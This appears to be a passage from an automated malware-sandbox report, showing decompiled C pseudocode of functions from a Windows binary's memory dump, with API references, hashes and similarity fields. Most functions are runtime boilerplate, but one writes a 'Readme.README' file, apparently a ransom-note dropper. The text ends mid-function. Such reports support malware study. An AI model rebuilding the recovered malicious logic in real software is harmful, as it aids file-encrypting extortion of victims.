                    • Opcode ID: 8bd28f2e67d7e6bd141d252546f551c36afcdb995a1e8a33ababbea6d1a4fa63
                    • Instruction ID: 5c3157e5719c428a52d0304978b7635a6d31aae58f439614d32ee0129893e2e1
                    • Opcode Fuzzy Hash: 8bd28f2e67d7e6bd141d252546f551c36afcdb995a1e8a33ababbea6d1a4fa63
                    • Instruction Fuzzy Hash: DC51A171D0020B9BDF239FAACA48EAF7BB4AF95314F14016EE501A72F1D7759902CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E01408D80(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				void* _v12;
                    				void* _t15;
                    				int _t16;
                    				signed int _t19;
                    				signed int _t32;
                    				signed int _t33;
                    				signed int _t36;
                    
                    				_t36 = _a4;
                    				_push(_t32);
                    				_t15 = E0140DD90(_t36);
                    				_t33 = _t32 | 0xffffffff;
                    				if(_t15 != _t33) {
                    					_push(_a16);
                    					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
                    					if(_t16 != 0) {
                    						if((_v12 & _v8) == _t33) {
                    							goto L2;
                    						} else {
                    							_t19 = _v12;
                    							_t39 = (_t36 & 0x0000003f) * 0x30;
                    							 *( *((intOrPtr*)(0x143a740 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0x143a740 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x30) & 0x000000fd;
                    						}
                    					} else {
                    						E013FDB04(GetLastError());
                    						goto L2;
                    					}
                    				} else {
                    					 *((intOrPtr*)(E013FDB3A())) = 9;
                    					L2:
                    					_t19 = _t33;
                    				}
                    				return _t19;
                    			}

                    APIs
                    • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,00000000,?,?,?,?,01408E2F,?,?,00000002,00000000), ref: 01408DB9
                    • GetLastError.KERNEL32(?,01408E2F,?,?,00000002,00000000,?,0140826D,?,00000000,00000000,00000002,?,?,?,?), ref: 01408DC3
                    • __dosmaperr.LIBCMT ref: 01408DCA
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorFileLastPointer__dosmaperr
                    • String ID:
                    • API String ID: 2336955059-0
                    • Opcode ID: 1fc540336f193ba43415e0ac10aec0a5a8056f054f8ca3a3a37361988d83801d
                    • Instruction ID: ecbfec5571651025b12fd30a4de2ed7f70e2f036fcab1cc70c17f1be194fb3b6
                    • Opcode Fuzzy Hash: 1fc540336f193ba43415e0ac10aec0a5a8056f054f8ca3a3a37361988d83801d
                    • Instruction Fuzzy Hash: EA012832A1011A6BCB178FEADC448AE7B29DFD5230B34031AE9119B2E0EA71DC039790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E013FEB5D(WCHAR* _a4, WCHAR* _a8) {
                    				int _t3;
                    
                    				_t3 = MoveFileExW(_a4, _a8, 2); // executed
                    				if(_t3 != 0) {
                    					return 0;
                    				} else {
                    					return E013FDB04(GetLastError()) | 0xffffffff;
                    				}
                    			}





                    APIs
                    • MoveFileExW.KERNEL32(000000FF,01415DA7,00000002,?,013C68A5,?,?,?,00000043,00000043,01415DA7,000000FF), ref: 013FEB6A
                    • GetLastError.KERNEL32(?,013C68A5,?,?,?,00000043,00000043,01415DA7,000000FF), ref: 013FEB74
                    • __dosmaperr.LIBCMT ref: 013FEB7B
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorFileLastMove__dosmaperr
                    • String ID:
                    • API String ID: 2142343326-0
                    • Opcode ID: b2645c225e75f69a3707cc39b057ef08723d73d2698733c64eb9250edcac2f54
                    • Instruction ID: b65273ba8d8895b960cbe1580122cd2e873295d66a33f1f9c36545fcbd041124
                    • Opcode Fuzzy Hash: b2645c225e75f69a3707cc39b057ef08723d73d2698733c64eb9250edcac2f54
                    • Instruction Fuzzy Hash: 88D05E3210510877CB201EF5AC0CD163B199B41378B204115F72C851A1DA36C810C610
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 60%
                    			E013C9F85(void* __edx, intOrPtr _a4) {
                    				intOrPtr _v8;
                    				char _v16;
                    				signed int _v20;
                    				short _v4116;
                    				char _v4292;
                    				char _v4308;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t19;
                    				signed int _t20;
                    				intOrPtr _t30;
                    				void* _t34;
                    				void* _t38;
                    				void* _t47;
                    				intOrPtr* _t52;
                    				signed int _t55;
                    
                    				_t47 = __edx;
                    				_push(0xffffffff);
                    				_push(E01416127);
                    				_push( *[fs:0x0]);
                    				E013F2860();
                    				_t19 =  *0x1435234; // 0x78d9f939
                    				_t20 = _t19 ^ _t55;
                    				_v20 = _t20;
                    				_push(_t20);
                    				 *[fs:0x0] =  &_v16;
                    				wsprintfW( &_v4116, L"%s\\Readme.README", _a4);
                    				E013F5890(0,  &_v4308, 0, 0xc0);
                    				_push(1);
                    				E013C28D3( &_v4308);
                    				_v8 = 0;
                    				E013C71BF( &_v4308, _t47, 0,  &_v4116, 0x22, 0x40);
                    				_t52 =  *0x1435074; // 0x141bc40
                    				_t10 = _t52 + 1; // 0x141bc41
                    				_t38 = _t10;
                    				do {
                    					_t30 =  *_t52;
                    					_t52 = _t52 + 1;
                    					_t59 = _t30;
                    				} while (_t30 != 0);
                    				_push(0);
                    				_push(0);
                    				_push(0); // executed
                    				E013C8014( &_v4292, _t59); // executed
                    				_push(0);
                    				_push(_t52 - _t38);
                    				_push( *0x1435074);
                    				E013C853F( &_v4292, _t59);
                    				E013C65F9( &_v4308, _t59);
                    				_t34 = E013C4020( &_v4308);
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t34, _v20 ^ _t55);
                    			}




















                    APIs
                    • wsprintfW.USER32(?,%s\Readme.README,?,78D9F939,00000000,00000000,00000043,01416127,000000FF,?,013C975D,00000043), ref: 013C9FC6
                      • Part of subcall function 013C28D3: __EH_prolog3.LIBCMT ref: 013C28DA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog3wsprintf
                    • String ID: %s\Readme.README
                    • API String ID: 3269967010-1742281136
                    • Opcode ID: 0204d6cda3180bcddb033e6e6465c406d3dd1af8e6f067edfd033486898847b9
                    • Instruction ID: 448dc4d5e412671f17829e4633d7f1a13c1c7b0581657889c0dbad0c1212914f
                    • Opcode Fuzzy Hash: 0204d6cda3180bcddb033e6e6465c406d3dd1af8e6f067edfd033486898847b9
                    • Instruction Fuzzy Hash: 17219571900299ABCB20DF59DC44FEBBB78FB54B44F00019DF64A97184DB716A44CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 66%
                    			E013C5C8B(void* __ebx, char* __ecx, void* __edi, void* __esi, signed int _a4, char _a8) {
                    				signed int _t11;
                    				void* _t12;
                    				intOrPtr _t14;
                    				void* _t18;
                    				signed int _t21;
                    				signed int _t29;
                    
                    				_t17 = __ecx;
                    				_push(__esi);
                    				_t21 = _a4;
                    				if(_t21 > 0xfffffffe) {
                    					_push("string too long");
                    					_t12 = E013F0F81(_t18, __edi, _t21, __eflags);
                    					asm("int3");
                    					asm("lock inc dword [ecx+0x4]");
                    					return _t12;
                    				} else {
                    					if( *((intOrPtr*)(__ecx + 0x14)) >= _t21) {
                    						__eflags = _a8;
                    						if(_a8 == 0) {
                    							L6:
                    							__eflags = _t21;
                    							if(_t21 == 0) {
                    								 *(_t17 + 0x10) =  *(_t17 + 0x10) & _t21;
                    								__eflags =  *((intOrPtr*)(_t17 + 0x14)) - 0x10;
                    								if( *((intOrPtr*)(_t17 + 0x14)) >= 0x10) {
                    									_t17 =  *_t17;
                    								}
                    								 *_t17 = 0;
                    								goto L10;
                    							}
                    						} else {
                    							__eflags = _t21 - 0x10;
                    							if(_t21 >= 0x10) {
                    								goto L6;
                    							} else {
                    								_t14 =  *((intOrPtr*)(__ecx + 0x10));
                    								__eflags = _t21 - _t14;
                    								_t15 =  <  ? _t21 : _t14;
                    								_t11 = E013C6118(__ecx, 1,  <  ? _t21 : _t14);
                    								goto L10;
                    							}
                    						}
                    					} else {
                    						_push( *((intOrPtr*)(__ecx + 0x10)));
                    						_push(_t21); // executed
                    						_t11 = E013C5927(__ebx, __ecx); // executed
                    						L10:
                    						_t29 = _t21;
                    					}
                    					return _t11 & 0xffffff00 | _t29 != 0x00000000;
                    				}
                    			}










                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 013C5CE5
                      • Part of subcall function 013C5927: __EH_prolog3_catch.LIBCMT ref: 013C592E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog3_catchXinvalid_argumentstd::_
                    • String ID: string too long
                    • API String ID: 4202626062-2556327735
                    • Opcode ID: 7464fd1a34e84ab68ab86d3e5f3a955a49e288d9da23f7892d21b2330d3e27ab
                    • Instruction ID: 9b2a14d61171cddbd44004918754187b590de1c6c43c39003c8936747e496bc9
                    • Opcode Fuzzy Hash: 7464fd1a34e84ab68ab86d3e5f3a955a49e288d9da23f7892d21b2330d3e27ab
                    • Instruction Fuzzy Hash: 0FF0F431A00720ABDF269A1C84406A97A54AF11E2DF34C69EE9515E1C2C362EC82C7D2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E013C8305(void* __ecx, void* __edi) {
                    				signed int _t60;
                    				signed int _t63;
                    				signed int _t64;
                    				void* _t73;
                    				signed int _t75;
                    				signed int _t85;
                    				void* _t93;
                    				void* _t94;
                    				void* _t95;
                    				signed int _t98;
                    				intOrPtr _t102;
                    				signed int _t111;
                    				signed char* _t113;
                    				void* _t120;
                    				intOrPtr _t121;
                    				void* _t122;
                    
                    				_t114 = __edi;
                    				_t94 = __ecx;
                    				_push(0x30);
                    				E013F26F6(E01415FEE);
                    				_t93 = _t94;
                    				_t60 =  *(_t93 + 0x1c);
                    				_t95 =  *_t60;
                    				if(_t95 == 0) {
                    					L3:
                    					if( *((intOrPtr*)(_t93 + 0x4c)) != 0) {
                    						E013C60BF(_t93);
                    						if( *((intOrPtr*)(_t93 + 0x38)) != 0) {
                    							 *((intOrPtr*)(_t122 - 0x18)) = 0xf;
                    							 *((intOrPtr*)(_t122 - 0x1c)) = 0;
                    							 *((char*)(_t122 - 0x2c)) = 0;
                    							_push( *((intOrPtr*)(_t93 + 0x4c)));
                    							 *((intOrPtr*)(_t122 - 4)) = 0;
                    							_t63 = E013FDFFD();
                    							_t98 = _t63;
                    							_t64 = _t63 | 0xffffffff;
                    							 *(_t122 - 0x3c) = _t64;
                    							while(_t98 != _t64) {
                    								E013C6296(_t93, _t122 - 0x2c, _t112, _t114, 1, _t98);
                    								_t114 =  >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c;
                    								_t117 =  >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c;
                    								_t112 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x38))));
                    								_t71 =  *((intOrPtr*)(_t122 - 0x1c)) + ( >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c);
                    								_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x38)))) + 0x18))(_t93 + 0x40,  >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c,  *((intOrPtr*)(_t122 - 0x1c)) + ( >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c), _t122 - 0x30, _t122 - 0x11, _t122 - 0x10, _t122 - 0x34);
                    								if(_t73 >= 0) {
                    									if(_t73 <= 1) {
                    										if( *((intOrPtr*)(_t122 - 0x34)) != _t122 - 0x11) {
                    											_t79 =  >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c;
                    											_t102 =  *((intOrPtr*)(_t122 - 0x30));
                    											_t120 =  *((intOrPtr*)(_t122 - 0x1c)) - _t102 + ( >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c);
                    											if(_t120 > 0) {
                    												while(1) {
                    													_push( *((intOrPtr*)(_t93 + 0x4c)));
                    													_t120 = _t120 - 1;
                    													_push( *((char*)(_t120 + _t102)));
                    													E013FEAED();
                    													if(_t120 <= 0) {
                    														goto L14;
                    													}
                    													_t102 =  *((intOrPtr*)(_t122 - 0x30));
                    												}
                    											}
                    											goto L14;
                    										} else {
                    											_t106 =  >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c;
                    											_t83 =  *((intOrPtr*)(_t122 - 0x30)) - ( >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c);
                    											E013C6DE5(_t122 - 0x2c, 0,  *((intOrPtr*)(_t122 - 0x30)) - ( >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c));
                    											goto L20;
                    										}
                    										L26:
                    									} else {
                    										if(_t73 == 3) {
                    											if( *((intOrPtr*)(_t122 - 0x1c)) < 1) {
                    												L20:
                    												_push( *((intOrPtr*)(_t93 + 0x4c)));
                    												_t85 = E013FDFFD();
                    												_t98 = _t85;
                    												_t64 = _t85 | 0xffffffff;
                    												continue;
                    											} else {
                    												_t87 =  >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c;
                    												E013C880D(_t122 - 0x11, 1,  >=  ?  *((void*)(_t122 - 0x2c)) : _t122 - 0x2c, 1);
                    												L14:
                    												_t64 =  *(_t122 - 0x11) & 0x000000ff;
                    												L15:
                    												 *(_t122 - 0x3c) = _t64;
                    											}
                    										}
                    									}
                    								}
                    								E013C6118(_t122 - 0x2c, 1, 0);
                    								_t75 =  *(_t122 - 0x3c);
                    								goto L17;
                    							}
                    							goto L15;
                    						} else {
                    							 *(_t122 - 0x35) = 0;
                    							_t60 = E013C2207(_t122 - 0x35,  *((intOrPtr*)(_t93 + 0x4c))); // executed
                    							if(_t60 == 0) {
                    								goto L4;
                    							} else {
                    								_t75 =  *(_t122 - 0x35) & 0x000000ff;
                    							}
                    						}
                    					} else {
                    						L4:
                    						_t75 = _t60 | 0xffffffff;
                    					}
                    				} else {
                    					_t112 =  *((intOrPtr*)(_t93 + 0x2c));
                    					_t121 =  *_t112;
                    					_t60 = _t121 + _t95;
                    					if(_t95 >= _t60) {
                    						goto L3;
                    					} else {
                    						 *_t112 = _t121 - 1;
                    						_t111 =  *(_t93 + 0x1c);
                    						_t113 =  *_t111;
                    						 *_t111 =  &(_t113[1]);
                    						_t75 =  *_t113 & 0x000000ff;
                    					}
                    				}
                    				L17:
                    				return E013F26B1(_t75);
                    				goto L26;
                    			}




















                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog3_
                    • String ID:
                    • API String ID: 2427045233-0
                    • Opcode ID: bd2b005df423bcefe151cf5841811300f04adcdf62b7e5bf0c1f5aab0d3ca993
                    • Instruction ID: 3de7389c3104aa47a1a072feec72208066e27bd654951dcf7dd625808fa1c053
                    • Opcode Fuzzy Hash: bd2b005df423bcefe151cf5841811300f04adcdf62b7e5bf0c1f5aab0d3ca993
                    • Instruction Fuzzy Hash: D2513E71E0410ADFCF15DFA8D8909EEB7B9AF48714F1081AEE921B7291DB71EA44CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E0140758B() {
                    				signed int _t20;
                    				signed int _t22;
                    				long _t23;
                    				signed int _t25;
                    				void* _t28;
                    				signed int _t31;
                    				void* _t33;
                    
                    				_t31 = 0;
                    				do {
                    					_t20 = _t31 & 0x0000003f;
                    					_t33 = _t20 * 0x30 +  *((intOrPtr*)(0x143a740 + (_t31 >> 6) * 4));
                    					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
                    						 *(_t33 + 0x28) = 0x81;
                    						_t22 = _t31;
                    						if(_t22 == 0) {
                    							_push(0xfffffff6);
                    						} else {
                    							if(_t22 == 1) {
                    								_push(0xfffffff5);
                    							} else {
                    								_push(0xfffffff4);
                    							}
                    						}
                    						_pop(_t23);
                    						_t28 = GetStdHandle(_t23);
                    						if(_t28 == 0xffffffff || _t28 == 0) {
                    							_t25 = 0;
                    						} else {
                    							_t25 = GetFileType(_t28); // executed
                    						}
                    						if(_t25 == 0) {
                    							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                    							 *(_t33 + 0x18) = 0xfffffffe;
                    							_t20 =  *0x143a398; // 0xb00378
                    							if(_t20 != 0) {
                    								_t20 =  *(_t20 + _t31 * 4);
                    								 *(_t20 + 0x10) = 0xfffffffe;
                    							}
                    						} else {
                    							_t20 = _t25 & 0x000000ff;
                    							 *(_t33 + 0x18) = _t28;
                    							if(_t20 != 2) {
                    								if(_t20 == 3) {
                    									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
                    								}
                    							} else {
                    								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                    							}
                    						}
                    					} else {
                    						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
                    					}
                    					_t31 = _t31 + 1;
                    				} while (_t31 != 3);
                    				return _t20;
                    			}











                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 014075D7
                    • GetFileType.KERNEL32(00000000), ref: 014075E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: FileHandleType
                    • String ID:
                    • API String ID: 3000768030-0
                    • Opcode ID: dc39b36a37075e5077c7f7df35fb29a5e0cce641552b2a2bc613ebe000463cdc
                    • Instruction ID: 0c30020e627716d65828c2b63327cf88734bdb664b15d18256de3cc7c72c21d0
                    • Opcode Fuzzy Hash: dc39b36a37075e5077c7f7df35fb29a5e0cce641552b2a2bc613ebe000463cdc
                    • Instruction Fuzzy Hash: 6C11933150878186D733493F8C88663BE959786172B280B3BD1F786BF1D635F5839682
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E013C57A6(intOrPtr __ebx, signed int _a4, signed int _a8, char _a12) {
                    				char _v20;
                    				char _v36;
                    				void* __esi;
                    				signed int _t19;
                    				signed int _t20;
                    				signed int _t22;
                    				signed int _t24;
                    				signed int _t37;
                    				signed int _t39;
                    				intOrPtr _t41;
                    				signed int _t42;
                    				signed int _t43;
                    				signed int _t44;
                    				signed int _t50;
                    				signed int _t51;
                    				signed int _t52;
                    				void* _t56;
                    				void* _t58;
                    				void* _t62;
                    
                    				_t41 = __ebx;
                    				_t56 = _t62;
                    				_t42 = _a4;
                    				if(_t42 != 0) {
                    					_t20 = _t19 | 0xffffffff;
                    					_t50 = _t20 % _a8;
                    					__eflags = _t20 / _a8 - _t42;
                    					if(_t20 / _a8 >= _t42) {
                    						_t43 = _t42 * _a8;
                    						__eflags = _a12;
                    						if(__eflags == 0) {
                    							L10:
                    							_t22 = E013F21A5(__eflags, _t43); // executed
                    							_pop(_t44);
                    							__eflags = _t22;
                    							if(_t22 == 0) {
                    								goto L8;
                    							} else {
                    								return _t22;
                    							}
                    						} else {
                    							__eflags = _t43 - 0x1000;
                    							if(__eflags < 0) {
                    								goto L10;
                    							} else {
                    								_t10 = _t43 + 0x23; // 0x33
                    								_t28 = _t10;
                    								__eflags = _t10 - _t43;
                    								if(__eflags <= 0) {
                    									goto L3;
                    								} else {
                    									_t37 = E013F21A5(__eflags, _t28); // executed
                    									_t44 = _t37;
                    									__eflags = _t44;
                    									if(_t44 != 0) {
                    										_t11 = _t44 + 0x23; // 0x23
                    										_t39 = _t11 & 0xffffffe0;
                    										__eflags = _t39;
                    										 *(_t39 - 4) = _t44;
                    										return _t39;
                    									} else {
                    										L8:
                    										_push(_t51);
                    										_t52 = _t51 ^ _t51;
                    										E013FD9E6(_t44, _t52, _t52, _t52, _t52, _t52, _t52);
                    										_push(_t52);
                    										_push(_t52);
                    										_push(_t52);
                    										_push(_t52);
                    										_push(_t52);
                    										L16();
                    										asm("int3");
                    										_t24 = IsProcessorFeaturePresent(0x17);
                    										__eflags = _t24;
                    										if(_t24 != 0) {
                    											_push(5);
                    											asm("int 0x29");
                    										}
                    										_push(_t52);
                    										E013FD897(_t41, _t50, 0xc0000417, 2, 0xc0000417, 1);
                    										return TerminateProcess(GetCurrentProcess(), 0xc0000417);
                    									}
                    								}
                    							}
                    						}
                    					} else {
                    						L3:
                    						_push(_t56);
                    						_t58 = _t62;
                    						E013F0EB6( &_v20);
                    						E013F4EC6( &_v20, 0x1431644);
                    						asm("int3");
                    						_push(_t58);
                    						E013F3420( &_v36);
                    						E013F4EC6( &_v36, 0x1433704);
                    						asm("int3");
                    						__eflags =  *0x143aa64; // 0x0
                    						_t18 = __eflags != 0;
                    						__eflags = _t18;
                    						return 0 | _t18;
                    					}
                    				} else {
                    					return 0;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f578a0361dc63d9f77ee75e5008187c82f86b40946aafe2acf2e4258042f1ece
                    • Instruction ID: 28e4bb034e81bc297e8e2d6640a15124c33cc901822f1db89ad8b218aaa30fb8
                    • Opcode Fuzzy Hash: f578a0361dc63d9f77ee75e5008187c82f86b40946aafe2acf2e4258042f1ece
                    • Instruction Fuzzy Hash: 9201497120420A95EF0D9B7C8C08E6F3B4A5F8072CB14032DE62DC51C1DB31ED918288
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E0140392A(void* __ebx, void* __ecx) {
                    				void* _t2;
                    				intOrPtr _t3;
                    				signed int _t15;
                    				signed int _t16;
                    
                    				if( *0x143a610 == 0) {
                    					_push(_t15);
                    					E0140D0F6(__ecx); // executed
                    					_t2 = E0140D3DE(); // executed
                    					_t19 = _t2;
                    					if(_t2 != 0) {
                    						_t3 = E01403983(__ebx, _t19);
                    						if(_t3 != 0) {
                    							 *0x143a61c = _t3;
                    							E0140C706(0x143a610, _t3);
                    							_t16 = 0;
                    						} else {
                    							_t16 = _t15 | 0xffffffff;
                    						}
                    						E014012E1(0);
                    					} else {
                    						_t16 = _t15 | 0xffffffff;
                    					}
                    					E014012E1(_t19);
                    					return _t16;
                    				} else {
                    					return 0;
                    				}
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 7b73f3ab86e1804e42f655f3c528453978978ffd12e28ee686d399dd227587eb
                    • Instruction ID: 8090470abe52f379ab91af910c7d87c22cdb7381e219461039923247682c52f8
                    • Opcode Fuzzy Hash: 7b73f3ab86e1804e42f655f3c528453978978ffd12e28ee686d399dd227587eb
                    • Instruction Fuzzy Hash: D1E0A06250551259D6332ABF3848A6B1E456BE1631B21033FE468E71F4CF7084439295
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E013D8710(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                    				intOrPtr _v8;
                    				char _v16;
                    				signed int _v20;
                    				char _v60;
                    				char _v61;
                    				intOrPtr _v68;
                    				intOrPtr _v72;
                    				intOrPtr _v76;
                    				intOrPtr _v80;
                    				intOrPtr _v84;
                    				signed int _v88;
                    				intOrPtr _v92;
                    				char _v96;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t57;
                    				signed int _t58;
                    				intOrPtr _t60;
                    				intOrPtr _t62;
                    				void* _t69;
                    				void* _t74;
                    				intOrPtr _t80;
                    				void* _t83;
                    				intOrPtr* _t94;
                    				intOrPtr* _t96;
                    				intOrPtr _t98;
                    				intOrPtr _t100;
                    				signed int _t101;
                    				signed int _t103;
                    				signed int _t105;
                    				signed int _t117;
                    				void* _t122;
                    				intOrPtr _t125;
                    				intOrPtr _t126;
                    				signed int _t128;
                    				signed int _t130;
                    				void* _t131;
                    				void* _t132;
                    				void* _t133;
                    				void* _t134;
                    				void* _t135;
                    
                    				_push(0xffffffff);
                    				_push(E01417398);
                    				_push( *[fs:0x0]);
                    				_t132 = _t131 - 0x50;
                    				_t57 =  *0x1435234; // 0x78d9f939
                    				_t58 = _t57 ^ _t130;
                    				_v20 = _t58;
                    				_push(_t58);
                    				 *[fs:0x0] =  &_v16;
                    				_t125 = _a12;
                    				_t119 = _a8;
                    				_t100 = _a16;
                    				_t98 = _a4;
                    				_t117 =  *(_t125 + 0xc);
